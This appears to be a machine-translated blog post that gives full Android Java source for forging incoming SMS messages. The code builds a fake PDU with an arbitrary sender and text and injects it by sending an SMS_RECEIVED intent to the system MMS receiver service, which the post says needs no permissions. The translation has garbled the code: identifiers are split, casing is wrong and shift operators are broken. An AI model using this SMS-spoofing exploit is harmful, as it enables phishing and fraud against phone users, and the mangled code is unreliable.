0x01
This was discovered by the famous professor Jiang. The principle is simple and interesting.0x02 code implementationJava code package com. smstrick; import java. io. byteArrayOutputStream; import java. io. IOException; import java. lang. reflect. method; import java. util. calendar; import java. util. gregorianCalendar; import android. app. activity; import android. content. context; import android. content. intent; import android. OS. bundle; import android. telephony. phoneNumberUtils; import android. util. log; import android. view. view; import android. view. view. onClickListener; import android. widget. editText; public class SMSTrickActivity extends Activity implements OnClickListener {/** Called when the activity is first created. * // @ Override public void onCreate (Bundle savedInstanceState) {super. onCreate (savedInstanceState); setContentView (R. layout. main); View continue_button = this. findViewById (R. id. button1); continue_button.setOnClickListener (OnClickListener) this);} public void onClick (View v) {EditText eNum; EditText eMsg; String sNum; String sMsg; eNum = (EditText) findViewById (R. id. editText1); eMsg = (EditText) findViewById (R. id. editText2); sNum = eNum. getText (). toString (); sMsg = eMsg. getText (). toString (); // sNum cannot be blank if (sNum. equals ("") sNum = "123456"; createFakeSms (this. getApplicationContext (), sNum, sMsg);} private static void createFakeSms (Context context, String sender, String body) {// Source: http://stackoverflow.com/a/12338541 // Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app Byte [] pdu = null; byte [] scBytes = PhoneNumberUtils. networkPortionToCalledPartyBCD ("0000000000"); byte [] senderBytes = PhoneNumberUtils. networkPortionToCalledPartyBCD (sender); int lsmcs = scBytes. length; byte [] dateBytes = new byte [7]; Calendar calendar = new GregorianCalendar (); dateBytes [0] = reverseByte (byte) (calendar. get (Calendar. YEAR); dateBytes [1] = reverseByte (byte) (calendar ar. get (Cal Endar. MONTH) + 1); dateBytes [2] = reverseByte (byte) (calendar ar. get (Calendar. DAY_OF_MONTH); dateBytes [3] = reverseByte (byte) (calendar ar. get (Calendar. HOUR_OF_DAY); dateBytes [4] = reverseByte (byte) (calendar ar. get (Calendar. MINUTE); dateBytes [5] = reverseByte (byte) (calendar ar. get (Calendar. SECOND); dateBytes [6] = reverseByte (byte) (calendar ar. get (Calendar. ZONE_OFFSET) + calendar. get (Calendar. D ST_OFFSET)/(60x1000*15); try {Log. d ("ice", "test one"); ByteArrayOutputStream bo = new ByteArrayOutputStream (); bo. write (lsmcs); bo. write (scBytes); bo. write (0x04); bo. write (byte) sender. length (); bo. write (senderBytes); bo. write (0x00); bo. write (0x00); // encoding: 0 for default 7bit bo. write (dateBytes); try {String sReflectedClassName = "com. android. internal. telephony. gsmAlphabet "; fig Ss cReflectedNFCExtras = Class. forName (sReflectedClassName); Method stringToGsm7BitPacked = cReflectedNFCExtras. getMethod ("stringToGsm7BitPacked", new Class [] {String. class}); stringToGsm7BitPacked. setAccessible (true); byte [] bodybytes = (byte []) stringToGsm7BitPacked. invoke (null, body); bo. write (bodybytes);} catch (Exception e) {e. printStackTrace ();} pdu = bo. toByteArray ();} catch (IOExcep Tion e) {e. printStackTrace ();} Intent intent = new Intent (); intent. setClassName ("com. android. mms "," com. android. mms. transaction. smsReceiverService "); intent. setAction ("android. provider. telephony. SMS_RECEIVED "); intent. putExtra ("pdus", new Object [] {pdu}); // intent. putExtra ("format", "3gpp"); context. startService (intent);} private static byte reverseByte (byte B) {return (byte) (B & 0xF0)> 4 | (B & 0x0F) <4) ;}} 0x03 The core of the substantive analysis is to customize the system's Intent intent = new Intent (); intent. setClassName ("com. android. mms "," com. android. mms. transaction. smsReceiverService "); intent. setAction ("android. provider. telephony. SMS_RECEIVED "); intent. putExtra ("pdus", new Object [] {pdu}); // intent. putExtra ("format", "3gpp"); context. startService (intent); the intent that receives the SMS, thus forging the SMS without any permissions.